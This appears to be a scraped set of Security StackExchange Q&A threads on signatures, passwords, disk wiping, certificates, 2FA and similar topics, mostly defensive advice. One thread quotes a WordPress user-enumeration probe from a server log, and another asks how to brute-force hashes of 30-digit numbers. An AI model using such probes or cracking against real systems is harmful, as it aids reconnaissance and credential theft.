Context: I'm filling in my taxes and my country requires me to upload certain documents from my employer to verify the numbers I give to the government. These documents are "digitally signed". Now, before I use these documents, I'm required to "validate" these signatures so that the signature indicator becomes a green tick mark. One process to do this is outlined in this government document. I've discovered that if I email this PDF and download it on a different computer, the validation (the green tick mark) disappears, and I'm back to how it was before validation. This makes me believe that validation is a local exercise - it only tells me whether the current PC I'm on "trusts" this digital signature. I've also found that this validation only appears in Adobe Reader. If I open it in a browser (even from the same PC), it disappears. My questions: Is my assumption correct that validating a digital signature through this method is "local"? If that's right, what's the point of validating a digital signature when, if someone else opens it on their PC, it's going to appear as if it's not valid (without the green check mark) anyway?
"One process to do this is outlined in this government document." This document basically instructs you to trust the issuer of this signature on the local machine, by importing the issuer's certificate in the document into the local trust store. It is local only, i.e. it only makes changes to the local machine and not to the document itself, and thus these steps need to be retaken on any other machine where the signature should be checked. If these instructions are all you get, then I find this very questionable. The point of validating a document signature is to check that the document is issued by the expected person - so there needs to be some expectation already. Since you don't know the issuer and signer of the document personally, there is usually some trust chain involved to get to this expectation, i.e. you don't know the person directly, but you trust the government (in this case) and the government cryptographically tells you that they trust this person (as a government employee). See chain of trust for a deeper explanation of this concept. What you are asked to do in the instructions is different though. There is no mention of a trust chain (even if there is one shown on page 3); instead you are expected to simply trust the person because the instructions tell you to trust them. Blindly following these instructions will also make you trust non-government persons, i.e. potential scammers. Adobe even kind of warns you against doing this, but unfortunately only in technical terminology useless for most users (page 4). Additionally, these instructions ask you to grant very broad permissions, specifically to make the certificate associated with the document a trusted root. I'm pretty sure that this is not needed and could in fact be harmful. In fact, it specifically says that in this case it will not be checked whether the certificate gets revoked, which might happen if the government removes the trust from this employee's certificate (certificate compromised, employee left, ...). Unfortunately, this too is stated only in technical terms (page 5). In other words, these instructions are not intended to actually provide security. They are only intended to somehow show the green tick mark. My hope is that the person who ultimately needs to get these documents will do some proper checking; your task here is basically only to weed out early problems before uploading.
{ "source": [ "https://security.stackexchange.com/questions/263429", "https://security.stackexchange.com", "https://security.stackexchange.com/users/180681/" ] }
263,531
This likely stems from my complete lack of familiarity with encryption technology and IT security in general, however it isn't clear to me how biometric authentication (such as Apple's TouchID) makes the data it protects more secure than a simple password. It's clear to me that, individually , biometric authentication is more secure than a memorable passcode. A fingerprint, face or voice can't really be "guessed", for example, in the same way a password can, and is characterized by something like thousands or millions of datapoints. However, biometric authentication systems such as TouchID often only complement a simple passcode. If, for whatever reason, I'm unable to unlock my iPhone with my face or thumb, I can still unlock it with a 4-digit passcode. Since e.g. TouchID only adds another way to unlock e.g. an iPhone, isn't the protected data in principle easier to "hack" (and, in practice, something like just as difficult)? There are now two "entryways".
The main reason for Apple to introduce TouchID was to make people use more complex passwords. For the sake of quick and easy access to their phones, people often used very simple passwords or no passwords at all, because they found it impractical to type in long passwords. With TouchID, it became possible to use long and thus more secure passwords, while still being able to quickly and easily access the phone with just a finger's touch. So, while TouchID does not add security by itself, its practical use makes it possible to improve the security of the existing protection method.
{ "source": [ "https://security.stackexchange.com/questions/263531", "https://security.stackexchange.com", "https://security.stackexchange.com/users/280734/" ] }
263,564
I got an email (to my iCloud address) from Disney+. The email contained a subscriber agreement. I did not register for their service myself. On the Disney+ website I saw that there was indeed an account for my email address. Using "forgot password" I was able to log into the account and change the password. I contacted Disney support, asking them to delete the account. However, they said that they cannot delete the account since there is a running subscription via iCloud. This subscription has to be cancelled in order for the account to be deleted. At this point I was very concerned that someone had hacked into my iCloud (which runs under the email address used for the Disney+ account). So I logged into my iCloud and checked the running subscriptions and active devices, but there was no suspicious activity at all and no Disney+ subscription listed. My questions are: Is it technically possible that the Disney+ account is connected to my email address but using a different (unknown) iCloud account for the subscription? Are there any security concerns for me, or have I just randomly been given a free Disney+ account (by someone else's mistake)?
Yes, it's possible to use your email address and pay via credit card, PayPal, subscription cards, or the respective mobile providers (Apple / Google Pay). It does not have to be a payment with Apple Pay / your iCloud account. As you are able to log in, you should see the used payment method in the account's "billing details". I do not see any further security concerns on your side. You already checked for an intrusion into your iCloud account and there seems to be none, which is good. You contacted Disney and they did not care (which is questionable). I'd say whoever created this account is going to realize they are no longer able to log in and is therefore going to cancel the payment subscription sooner or later. Lesson learned for the person who created the account with a random email address. You will probably get a notification email after the subscription has ended; then you are able to delete the account.
{ "source": [ "https://security.stackexchange.com/questions/263564", "https://security.stackexchange.com", "https://security.stackexchange.com/users/280772/" ] }
263,582
I am setting up a Postgres DB that will never be used by humans. In fact, I really don't ever need to know the password myself. I assumed that just using a 256-bit (64 alphanumeric chars) hash of a Unix timestamp, i.e.: date +%s%3N | sha256sum would be pretty damn strong. A very important detail is I am not "hashing a password"... I am hashing a timestamp and using the SHA-256 hash as the password in the DB connection string. An example of one I could use has 31 lowercase chars and 33 integers, for an entropy of ~330 bits, which is.... well... I'd say pretty damn solid, if not completely insanely overkill. The reason I ask is because it STILL got flagged by Chainlink's password complexity check for only having lowercase chars and numbers. So... My question is, are they right? Is there something wrong with a 64-character alphanumeric password just because it doesn't have fancy capital letters? Is there something inherently wrong with using the SHA-256 algorithm with a timestamp like this? I am contemplating raising an issue on their GitHub stating that I should not have to set their SKIP_DATABASE_PASSWORD_COMPLEXITY_CHECK=true flag for such a password, and that they should consider the actual entropy of the password instead of just applying a set of simple rules.
"... for an entropy of ~330 bits, ..." The question is not how strong a password looks but how strong it actually is. SHA-256 does not add any entropy at all, so it all depends on what the input to SHA-256 was. And the entropy of the chosen input is pretty low: assuming that the attacker knows how the password was created, they can test all possible inputs around the time the password might have been created. A much stronger input would be to use real random data: dd if=/dev/random bs=1 count=32 | sha256sum While the output might look similarly strong, it is practically impossible for the attacker to predict the input.
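To illustrate just how small that input space is, a sketch of the offline search an attacker could run if they can narrow the creation time down to, say, one hour; the timestamps below are made up.

```python
# Sketch: brute-forcing a timestamp-derived SHA-256 password over a known time window.
import hashlib

def password_from_timestamp(ts_ms: int) -> str:
    # Mirrors `date +%s%3N | sha256sum`: date prints the timestamp followed by a newline.
    return hashlib.sha256(f"{ts_ms}\n".encode()).hexdigest()

start = 1_660_000_000_000            # assumed start of the search window (ms since epoch)
window = 60 * 60 * 1000              # one hour: only ~3.6 million candidates

# Stand-in for the real password an attacker obtained (e.g. from a leaked config):
leaked = password_from_timestamp(start + 1_234_567)

for ts in range(start, start + window):
    if password_from_timestamp(ts) == leaked:
        print("recovered creation time:", ts)
        break
```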
{ "source": [ "https://security.stackexchange.com/questions/263582", "https://security.stackexchange.com", "https://security.stackexchange.com/users/117565/" ] }
264,180
I'm looking for the name of a concept that works as follows: I post a hash of a file publicly, e.g. on Twitter. Whenever needed, I provide the file with the contents that produce the given hash. The purpose is perhaps to prove ownership, or otherwise prove that something was known to me in the past before it became public. Knowing the name will enable me to read more about it.
To me this sounds like a commitment scheme : A commitment scheme is a cryptographic primitive that allows one to commit to a chosen value (or chosen statement) while keeping it hidden to others, with the ability to reveal the committed value later ... Interactions in a commitment scheme take place in two phases: the commit phase during which a value is chosen and committed to the reveal phase during which the value is revealed by the sender, then the receiver verifies its authenticity You can see this term being used by several of the answers to this question, for example.
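A minimal hash-based commitment sketch along those lines; the random nonce is there so that others cannot brute-force a low-entropy statement from the published hash, and the statement text is just an example.

```python
# Sketch: commit to a statement now, reveal (nonce, statement) later for verification.
import hashlib
import os

def commit(statement: bytes) -> tuple[str, bytes]:
    nonce = os.urandom(32)
    digest = hashlib.sha256(nonce + statement).hexdigest()
    return digest, nonce          # publish the digest now; keep nonce + statement private

def verify(digest: str, nonce: bytes, statement: bytes) -> bool:
    return hashlib.sha256(nonce + statement).hexdigest() == digest

published, nonce = commit(b"I predicted this result on 2022-10-01")
# ... later, reveal the nonce and the statement ...
print(verify(published, nonce, b"I predicted this result on 2022-10-01"))  # True
```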
{ "source": [ "https://security.stackexchange.com/questions/264180", "https://security.stackexchange.com", "https://security.stackexchange.com/users/35666/" ] }
264,479
I have seen a few system designs in my time and one question keeps cropping up: is it bad practice to have a 'super admin' - a single user - or 'super admin' privileges in your system? By that I mean giving one or many users 'super admin' privileges so they basically never see a "you do not have permission" error and are never prevented from doing anything in the system. This is from a security standpoint mainly - if someone somehow managed to log in to an account that has 'super admin' privileges (when they shouldn't have access), they could wreak havoc as they can change anything in the system.
I would split my answer into two parts: Super admin in general: When designing a system, you do not want to get into a situation where no one is able to access the system and manage it as needed, especially when an emergency is at hand. On the other hand, you probably don't want a single entity to be able to manage and control all properties of the system. For this particular reason, many designs include this role but with a limited assignment. This role is mostly assigned to a "non-personal" user account whose credentials are safeguarded by a quorum of trusted people. Another option is to have this role assigned to multiple trusted users, with an approval quorum required to apply sensitive modifications. Sometimes a similar account is also created as a local account (in case the others are governed by an organization's centralized identity management platform such as Okta) to allow out-of-band access in case of emergencies. Users assuming super administrative privileges at all times: Per security design principles, you want to avoid excessive privileges assigned to personnel. Your system should support access packages and roles bound to the specific actions users need to perform over your system. Let them perform whatever operations they need, nothing else. It doesn't necessarily mean you are giving them the key to your castle if they are system administrators. You can put sensitive operations under additional security measures such as just-in-time access with an external supervisor to approve the grant, etc.
{ "source": [ "https://security.stackexchange.com/questions/264479", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15982/" ] }
264,491
I bought a wireless keyboard and mouse from a no-name brand (made in China) with a USB receiver. I'm currently wondering if the USB receiver could be compromised in a way that my computer could get infected with malware, or that allows someone to gain access to my computer. Should I be more careful with such USB sticks? How can I check if the USB receiver is clean? I'm not sure if I should use the keyboard/mouse - am I too cautious? I quote from an article: "If your mouse has programmable memory, like a gaming mouse that allows you to program macro buttons, the mouse itself could store and spread malware. To make matters worse, there are no known defensive mechanisms when it comes to attacks through USB devices. The reason is that all of that well-paid-for malware detection software you purchased can't detect firmware that is running on USB devices. The good news is there isn't really any monetary gain in creating viruses that specifically target hardware like computer mice, but malware can have an effect on the drivers that mice utilize, and this may result in hardware issues like key-swapping or keys not working." Would you agree with that analysis?
{ "source": [ "https://security.stackexchange.com/questions/264491", "https://security.stackexchange.com", "https://security.stackexchange.com/users/282252/" ] }
264,533
Our work e-mail server has started rewriting links in incoming mail through a redirecting gateway, for "security reasons": if I receive an e-mail containing a link to https://security.stackexchange.com , the link gets rewritten to https://es.sonicurlprotection-fra.com/click?PV=2&MSGID=202209021358500174760&URLID=1&ESV=10.0.18.7423&IV=D329C6F4AF0738E931FA9F0EAAD309B2&TT=1662127131399&ESN=kgatDRmAwf3NdgkHDeepamZT4x4VYB71UZXeLJNkMQ0%3D&KV=1536961729280&B64_ENCODED_URL=aHR0cHM6Ly9zZWN1cml0eS5zdGFja2V4Y2hhbmdlLmNvbQ&HK=B0A81618C6DD8CBAFF5376A265D02328AB2DA6B2A64AA8DA59F1662AC2089052 before the mail arrives into my Inbox. Clicking on this opaque blob redirects me to https://security.stackexchange.com . Presumably, the idea is that if the target address turns out to be malicious then the mail server provider (Sonicwall) can decide to block the link even retroactively in messages that have already been delivered. Is this kind of link tracking considered good security practice? Are there any authoritative opinions on it from researchers, for instance? At a first thought, I can come up with many disadvantages, and minimal advantages (but I am no security expert). I have tried looking for opinions online, but the only articles I find come from people that are trying to sell similar technology, so they might be biased: for instance this , this and this .
This practice actually has a bunch of security downsides that make it problematic. First, modifying the email breaks any sort of digital signature on it, such as DKIM. This can be used by the mail server or the mail client to verify that the author is who they say they are. For example, if your mail client says, "This email is from stackexchange.com," then you can know that the email may be legitimate if it looks like a StackExchange email, but this can't be done if you modify the email. Second, it also means that the URL no longer points to the actual domain. This makes phishing easier, since every illegitimate link looks just like a legitimate link: it goes to some rewritten domain. If the user is expecting a link to an internal domain, they can no longer determine if the link is legitimate just by looking at the hostname in the URL. A better practice would be to use some sort of endpoint software or trusted DNS server which logs all domains used or disallows known malicious sites. This is common in a lot of places and avoids the security downsides of tampering with data. You can also scan them when they come into the server and look for suspicious looking URLs, such as those which look like some sort of impersonation attack on legitimate domains or those which are known to be associated with malware or phishing. I also should point out that you should not under any circumstances use a TLS intercepting proxy as Steffen Ulrich suggests. Security research has found numerous vulnerabilities in these devices, including weak algorithms, insecure protocol versions, and lack of certificate validation, any of which can mean that data can just be decrypted by an attacker. What's more, they are often just functionally broken and don't speak the protocol correctly, which I can tell you from years of dealing with end user problems as a Git contributor.
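A small aside on how these rewritten links work: the gateway in the question embeds the original destination in the B64_ENCODED_URL query parameter as unpadded base64 (the exact parameter names are vendor-specific, and the padding handling below is an assumption), so a short Python sketch recovers it:
import base64

encoded = "aHR0cHM6Ly9zZWN1cml0eS5zdGFja2V4Y2hhbmdlLmNvbQ"  # taken from the example link
padded = encoded + "=" * (-len(encoded) % 4)  # restore the stripped base64 padding
print(base64.b64decode(padded).decode())      # https://security.stackexchange.com
This also illustrates the phishing point above: nothing about the visible hostname tells the user where they will actually end up.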
{ "source": [ "https://security.stackexchange.com/questions/264533", "https://security.stackexchange.com", "https://security.stackexchange.com/users/29374/" ] }
264,912
As the title says, in the rules of engagement I have my scope, the methodology used, etc., but I've been wondering if I should also include a list of tools (such as NMAP, Dirb/Ffuf, etc.) that might be used. And if not, how should I be transparent with the client about the way I'm going to perform the pentest? My concern is that management will not understand the tools I'd like to include in the RoE, even with a small description trying to explain the purpose of each tool.
You should explain your methodology, but a full list of tools usually isn't included for several reasons: You don't actually know all the tools that you're going to use before you've finished testing. Most clients don't really care and won't read it anyway. Some tools have names that are not very professional, which doesn't look great in a formal document. No one cares that you use "Notepad" or "Google Chrome", so adding things like that is a waste of time. It perpetuates the idea that pentesting is just running a load of tools against the target. Management don't need to know and understand all of the tools. When they get a builder in to build them a new office, they don't ask for a list of every tool that they're going to use. They hire a professional, and leave those decisions up to them. If the client asks, you can give them a list at the end of the engagement (or an indicative list before you start). But it's not something I would do as standard.
{ "source": [ "https://security.stackexchange.com/questions/264912", "https://security.stackexchange.com", "https://security.stackexchange.com/users/271649/" ] }
264,919
I visited stackoverflow.com and found in Chrome that its certificate is valid and has Common Name (CN) *.stackexchange.com . After that I checked a fingerprint for stackexchange.com and it matched the first one. I thought that Chrome would show me a warning that the domain didn't match, as stackoverflow.com doesn't redirect to stackexchange.com and it doesn't have a CNAME to it - dig +short stackoverflow.com cname - shows nothing. My question is: how does Chrome recognise that stackoverflow.com is part of *.stackexchange.com ?
A certificate Common Name is not the only thing used to validate a certificate. It is actually only used for very primitive certificates that lack a subjectAltName extension. The StackOverflow certificate has got a subjectAltName field with the following dNSNames in it, which allow the certificate to validate for StackOverflow. *.askubuntu.com *.blogoverflow.com *.mathoverflow.net *.meta.stackexchange.com *.meta.stackoverflow.com *.serverfault.com *.sstatic.net *.stackexchange.com *.stackoverflow.com *.stackoverflow.email *.stackoverflowteams.com *.superuser.com askubuntu.com blogoverflow.com mathoverflow.net openid.stackauth.com serverfault.com sstatic.net stackapps.com stackauth.com stackexchange.com stackoverflow.blog stackoverflow.com stackoverflow.email stackoverflowteams.com stacksnippets.net superuser.com
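If you want to check this yourself, a short sketch along these lines (Python standard library only; the host name is just an example) prints the DNS names a server's certificate is actually valid for:
import socket, ssl

def san_dns_names(host, port=443):
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port)) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()  # parsed certificate, including subjectAltName
            return [value for kind, value in cert.get("subjectAltName", ())
                    if kind == "DNS"]

print(san_dns_names("stackoverflow.com"))  # includes *.stackexchange.com among others
Chrome does essentially the same thing: it matches the requested hostname against every dNSName entry in the subjectAltName extension, not against the Common Name.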
{ "source": [ "https://security.stackexchange.com/questions/264919", "https://security.stackexchange.com", "https://security.stackexchange.com/users/189533/" ] }
265,066
We have a service running behind HTTPS and we are using SSL certificates from Let's Encrypt. The problem is that one of our clients distrusts the Let's Encrypt CA and, on certificate renewal, requires us to send the newly generated certificate so they can add it to their trust chain. Is this a common practice? What are the reasons to distrust certificates from Let's Encrypt?
This is an old policy. Getting a certificate used to be difficult and expensive, which kept malicious people from getting one and made a certificate an easy way to identify "trusted" sites. Because LE allows anyone to get a certificate, it also allows malicious people to get one, complete with the "green lock" and the appearance of "trust". In response, some organisations added a rule to not accept LE certificates so that sites that used them would not be "trusted", as misguided as that is. Very large corporate sites now use LE, so this policy makes no sense. So, I would work with the client to change their policy. In my experience, organisations that added this rule quickly rescinded it, and I have not heard of an organisation with it still in place.
{ "source": [ "https://security.stackexchange.com/questions/265066", "https://security.stackexchange.com", "https://security.stackexchange.com/users/199620/" ] }
265,424
I was looking through my Apache log files and besides other GET requests with response status codes of 4XX (error), I've found this one which has a 200 (success) response status code: "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 5453 "-" "Go-http-client/1.1" First of all, the status code 200 doesn't imply that the request was successful in regards to passing a variable successfully, correct? How would I check then, if such a probe/attack was successful? Would I manually need to go into my files and scan through the code if such a request would do something malicious? Lastly, what was the bot (I assume it is a bot) trying to achieve with this request specifically? Is it trying to get some data about WordPress users?
The reason it counts as "success" is because of the beginning: /?... This means the path the server cares about is /, which likely maps to the index of your web application. The query string after, ?rest_route=/wp/v2/users/, is likely ignored by your web application. In fact, you can try this on a bunch of websites, such as security.stackexchange.com/?rest_route=/wp/v2/users/ and you will get a 200 Success code returned. How can I check if it was successful? In this example, the "/wp/v2/users/" indicates that the attacker was likely trying to exploit a WordPress misconfiguration to retrieve the list of users through a REST API. If you open your page with that URL and see just the normal index, then it's safe to say that attempt failed. As for a general answer...that's hard to say. The whole field of digital forensics and incident response is about identifying such indicators of compromise.
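To make the "open your page with that URL" check concrete, a small sketch like this (Python standard library; example.com is a placeholder for your own site) fetches the probed URL and reports whether the response looks like a WordPress REST user listing or just your normal index page:
import json
import urllib.request

url = "https://example.com/?rest_route=/wp/v2/users/"  # replace with your own site
with urllib.request.urlopen(url) as resp:
    body = resp.read().decode("utf-8", errors="replace")

try:
    users = json.loads(body)
    # A WordPress install that honours this route returns a JSON array of user objects.
    print("The probe returned JSON - user data may be exposed:", users)
except json.JSONDecodeError:
    print("The response is not JSON, so the probe most likely just got your index page.")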
{ "source": [ "https://security.stackexchange.com/questions/265424", "https://security.stackexchange.com", "https://security.stackexchange.com/users/283904/" ] }
265,536
Can the internet be censored from the ISP itself? And what to do if the internet is censored by my ISP? Even TOR is not showing me the results I want: I had previously searched for the same keywords and got results but now I don't get anything. I have tried a premium VPN and TOR to browse content but both of them fail. How can I bypass my ISP censorship?
Generally speaking, your ISP can't censor Tor or VPNs except by blocking them altogether. Since you are also "censored" when using Tor and a VPN, it's more likely that either the search engine is censoring your results (if you are using the same one) or else the thing you are trying to find doesn't exist on the Internet any more.
{ "source": [ "https://security.stackexchange.com/questions/265536", "https://security.stackexchange.com", "https://security.stackexchange.com/users/284121/" ] }
265,582
Floppy disks used to have a physical means of preventing writing to them. No software could bypass that, no matter what. It had to be flicked physically and manually by a human being. Modern SD cards and SD card converters have a physical such switch, but it does not physically prevent anything and only "advises" the software to not write, which it can ignore at will, rendering it completely meaningless and downright deceptive . Not a single one of all my many external USB hard disks, even including an older and bigger 3.5" one, have even any such "pretend-switch" on them. Nothing. Why did they go from allowing physical write protection to not even having a silly "pretend-switch" for this? I've never heard anyone mention this, but to me it's absolutely mindblowing and keeps bothering me every single time I take out my backup media on both disks and memory cards and sticks. Being able to do this is crucial when restoring important backups on potentially malware-infested computers, or when people prone to making honest mistakes are dealing with them and you only want them to be able to fetch/read data but not corrupt/delete it. It would cost them maybe $0.001 extra per unit to add this. And I haven't even seen it on the really expensive products (except the fake ones on the memory cards mentioned above).
"Floppy disks used to have a physical means of preventing writing to them. No software could bypass that, no matter what. It had to be flicked physically and manually by a human being." They didn't. It was ultimately controlled by the floppy drive. The plastic tab indicated whether the floppy was write-protected or not, but ultimately a drive could be made that ignored it. That's no different from SD cards. What's changed is how much is exposed to the host computer: with floppies, the R/W signal could not be overridden by the host using the standard floppy disk interface. With SD card readers, it's simply a bit sent to the software driver for the card reader. Why doesn't modern media generally provide this? Well, if read-only is a required feature, there are (as indicated by other answers) products that offer this. In the not so far past, there was also the extremely common optical media: CD-R and later DVD-R, which held quite a lot of data and cost next to nothing, with writes after the initial recording being impossible. So in short: it's not a feature most customers are willing to pay for, so it's not delivered in most mass storage devices. If you need it, get a device with a switch, and pay the premium for it.
{ "source": [ "https://security.stackexchange.com/questions/265582", "https://security.stackexchange.com", "https://security.stackexchange.com/users/284190/" ] }
265,588
I already have an authenticator for Amazon AWS, and I'm being regularly asked to add an SMS 2FA as well. If I add SMS MFA, will I become vulnerable to sim-swapping attacks on that MFA? Same thing with many other services, I already have authenticators with them, and they're still asking me to add an SMS 2FA. Here's the prompt I get, although I already have an authenticator setup:
{ "source": [ "https://security.stackexchange.com/questions/265588", "https://security.stackexchange.com", "https://security.stackexchange.com/users/837/" ] }
265,601
I have a list of hashes, and I need to find the original value of any of them. So far I know that the hashed values are only numbers of length 30. The format should be something like 012524012524012524012524012524. What is the best way to create an algorithm that brute-forces numbers until any hash matches? I have thought of a few options but I don't think any of them are optimized: Generate random numbers until one collides. Iterate numbers from 000000000000000000000000000000 sequentially.
{ "source": [ "https://security.stackexchange.com/questions/265601", "https://security.stackexchange.com", "https://security.stackexchange.com/users/284210/" ] }
265,796
How serious a security problem is it to have the name of the web server in the HTTP header (Apache, Nginx etc.)? I am discussing this with a system administrator and he told me that deleting the version is easy, but deleting the name of the server (in our case nginx) is not so simple and takes more time. So he thinks that it is useless, because there are a lot of tools that are able to detect the type of server based on the HTTP response anyway. On the other hand, I have always read that information like this should be removed. My question is: is information like this a serious problem that should be removed, or not? (Assume a fully patched server.)
Assuming that the server is fully patched and you're just talking about product name and not version, I wouldn't generally regard this as a serious problem. Essentially all security hardening is a trade-off between effort and risk reduction. Here you would potentially be reducing the risk marginally of a successful attack, but at the cost of effort to implement. In reality there's likely other places the same effort could be spent, to better effect. In an ideal world you don't give possible attackers any information you don't have to as it makes their lives harder and forces them to spend more effort on each attack, but with things like product name (especially for common products like nginx) that's a pretty marginal benefit.
{ "source": [ "https://security.stackexchange.com/questions/265796", "https://security.stackexchange.com", "https://security.stackexchange.com/users/284521/" ] }
265,801
I have a 4TB mechanical hard drive that was encrypted before I ever wrote any file on it. I used a 25 character password with symbols. Before I sold it, I unmounted the disk while it was still encrypted, then I formatted it to a new unencrypted volume. After I formatted it, it appeared on my Desktop as a new empty unencrypted disk. I used Disk Utility on Mac to write random data on it, but it was very slow, so I ended up writing on only 10% of the disk. Has the data been securely erased beyond any doubt?
Has the data been securely erased beyond any doubt? No. Does it matter in practice? Probably not, at least for any sensible domestic/company threat model. For the purposes of this answer I will presume that your disk was encrypted with a standard password unlock scheme and no TPM was involved. I will also presume a mechanical hard disk, as noted in your question, not an SSD. It is important to note that SSDs have special properties when it comes to FDE and data destruction which complicate the situation; there are other questions/answers on this site that discuss this in detail. Typically, FDE volumes have a randomly generated volume key that is used for the bulk encryption of data on the disk. The volume key (and various other information) is placed into a volume header. Your disk unlock password is used to derive a volume unlock key, which is used to encrypt the volume header. This description is a bit of a simplification, but for the purposes of this question it is sufficient. There are several reasons for using this volume header approach rather than just using your unlock key directly for bulk data encryption. The primary benefit is convenience: if you want to change your password, the only thing that needs to be re-encrypted is the volume header, rather than the entire disk. There are other benefits, too: It minimises the amount of data secured with the same key, since two disks that use the same password will utilise different bulk encryption keys. The bulk encryption key can be exported for recovery purposes, and if this key is compromised then it only compromises that one disk instead of all disks that use the same password. Implementing multi-user unlock schemes is simple. The volume header is duplicated for each user and encrypted with an unlock key derived from that user's password. Any one user can then unlock the disk. Alternative unlock schemes (e.g. TPM, hardware token / smart card, etc.) are easier to implement. Data destruction does not require that the whole disk be wiped, but only that the volume headers are destroyed, which saves time and disk wear. (The story is more complicated on SSDs but we're talking about HDDs here.) That last point is a double-edged sword. If the FDE volume header is damaged or destroyed, e.g. due to disk corruption, all of your data is unrecoverable . If you lose the volume header, you lose the key that was used to encrypt the data on the disk, so the recovery problem becomes equivalent to cracking the randomly generated key. This is great if you're intentionally trying to destroy the data on the disk, but it sucks when it happens unintentionally. To minimise the risk of unintentional damage to the volume header, FDE schemes typically make one or more backup copies of that header. When you encrypt the drive you are usually prompted to save a recovery key or make some kind of recovery USB stick. The exact implementations vary, but these recovery processes either back up the plaintext bulk encryption key (and other necessary parameters like the IV) or the entire volume header block. This recovery material is usually designed to be able to decrypt the bulk data on the disk without needing an intact volume header or the unlock password. However, this is usually not the only backup. Most FDE schemes store a primary and secondary volume header somewhere on the disk, with the secondary header being used as a built-in backup. Both headers are encrypted, so there's no security impact to making multiple copies. 
A common approach is to store one copy at the "start" of the disk (low logical block address) and another copy either at the "end" of the disk (high logical block address) or at some known offset. This ensures that the two copies are physically separate on the storage medium, so a bad sector or other corruption is unlikely to affect both copies. Corruption can be detected by comparing the two headers. This volume header backup scheme has implications for data destruction. Exploring these implications is easiest if we think about the potential scenarios: FDE was always in use on the drive (no risk of latent plaintext) but no data has been wiped. A partial wipe was performed on the disk. The primary volume header was wiped, but not the secondary header (or vice versa). The bulk data was not wiped, or only a small part of it was. A partial wipe was performed on the disk. Both primary and secondary volume headers were wiped. The bulk data was not wiped, or only a small part of it was. A full wipe was performed on the disk. The first scenario is no different to normal use of FDE. An attacker would need to guess or bruteforce your password, get access to your recovery key, or bruteforce the volume header key or bulk encryption key (which is computationally infeasible). In the second scenario you've wiped one header but not the other. Since the disk contains a secondary header, it can be used to unlock the disk. Again, an attacker would need to guess or bruteforce your password, get access to your recovery key, or bruteforce the volume header key or bulk encryption key (computationally infeasible). If they do recover the bulk encryption key through one of these means, the difficulty of recovery depends on how much of the bulk data was wiped alongside the header. In the third scenario you've wiped both headers. The disk no longer contains a copy of the bulk encryption key. An attacker no longer has the option to brute-force or otherwise crack your unlock password. They would need to get access to your recovery key, or bruteforce the bulk encryption key (again, computationally infeasible). If they do recover the bulk encryption key through one of these means, the difficulty of recovery depends on how much of the bulk data was wiped alongside the header. In the fourth scenario you've wiped the whole disk. None of the data is left, so an attacker can't do anything. Ignore anyone who starts talking about multi-pass wiping and magical physical-layer recovery tricks like Magnetic Force Microscopy (MFM) - it's nonsense, and even if it did work nobody is going to bother (not even nation states). A full rant about wacky DoD disk erasure standards and their ongoing abuse by wiping software marketing teams is out of scope for this answer. Suffice to say that NIST SP 800-88 Rev.1 is the right place to look if you want a high quality media sanitisation standard. Now the question arises: which of these situations applies to you? It depends, but the answer is almost certainly 2 or 3. If the FDE implementation you used puts the secondary volume header at a fixed offset, it's possible that you wiped both of them, which would put you in scenario 3. If the secondary volume header is at the "end" of the disk, then it may not have been wiped, which would put you in scenario 2. This is assuming that the disk wipe utility starts at the beginning of the disk (LBA 0) and writes sequentially from there - if it doesn't, all bets are off. 
You can reasonably gather whether you're in scenario 2 or 3 by attempting to mount the disk. If you can get it to mount without needing a recovery key, you didn't get both of the headers. If you can't, you're probably in scenario 3. There may be edge cases where the backup volume header is present but the software still fails to mount/recover for some reason, so it's not a 100% guarantee, but it's a good indication. It's also important to note that you probably damaged the filesystem, so the FDE might unlock successfully but the underlying filesystem might not actually mount; this is an important distinction because unlocking is the bit we actually care about for security. Given all this, the worst case scenario is that your data isn't unrecoverable but is still protected by FDE. Almost every single attacker (bored teenager, cybercriminals, law enforcement) will be defeated by this already, with an exception for the case where someone compels you to reveal your unlock password (highly unlikely). The best case scenario is that you wiped the volume headers and the data is infeasible to recover even with all the computational resources in the world, unless someone gets at your recovery keys (if you have them). Since FDE already provides protection against everything except being legally compelled to reveal your password (I'll assume that someone hitting you with a wrench is out of scope for your threat model because you're not a character on the TV show "24") it's mostly a symbolic improvement in security for the bulk of sensible threat models. TL;DR - I wouldn't worry about it too much. FDE alone is already a concrete security control as long as your password is good. Any amount of disk wiping you do afterwards is a tradeoff between time/effort and a little extra defence in depth.
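If you want something more concrete than "try to mount it", one option is to scan the raw device (or an image of it) for your FDE format's header signature; finding no copies of it is a strong sign you are in scenario 3. The sketch below is generic Python, and the MAGIC value is an assumption you must replace with whatever signature your format uses (LUKS headers, for example, start with the bytes b"LUKS\xba\xbe"; Apple's CoreStorage/APFS containers use their own on-disk signatures, so check the relevant documentation):
MAGIC = b"LUKS\xba\xbe"   # placeholder signature - substitute your FDE format's magic bytes
CHUNK = 1 << 20           # scan 1 MiB at a time

def find_magic(path, magic=MAGIC):
    hits, offset, tail = [], 0, b""
    with open(path, "rb") as f:
        while True:
            block = f.read(CHUNK)
            if not block:
                break
            buf = tail + block            # keep a small overlap so boundary hits are found
            i = buf.find(magic)
            while i != -1:
                hits.append(offset - len(tail) + i)
                i = buf.find(magic, i + 1)
            tail = buf[-(len(magic) - 1):]
            offset += len(block)
    return hits

print(find_magic("/path/to/disk.img"))  # hypothetical image path; raw devices need root
Note that this only tells you whether recognisable headers are still present; it says nothing about the bulk data, which (as discussed above) is unreadable without the key either way.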
{ "source": [ "https://security.stackexchange.com/questions/265801", "https://security.stackexchange.com", "https://security.stackexchange.com/users/135759/" ] }
265,805
I have a need to send a 3rd party regular Excel files. I currently use excel password protection on the file itself and the password I use is known by the 3rd party. However, today I read a thread on this forum that appears to say it is unsafe to password-protect an Excel file. But this is counter to my understanding because I believe Excel uses 256-bit AES encryption which is currently unbreakable. However the thread also talks about individual features of Excel and I am finding it difficult to separate the file password encryption from the feature protection, like protect a sheet in a workbook or cell protection. So can someone advise if I place a password on the file such that it can not be opened, is it safe (within the limits of 256-bit encryption) or not? BTW, I am using M365, I am not bothered by over-the-shoulder or cut-and-paste hacks as that is the 3rd parties problem from a data protection point of view.
{ "source": [ "https://security.stackexchange.com/questions/265805", "https://security.stackexchange.com", "https://security.stackexchange.com/users/284541/" ] }
265,814
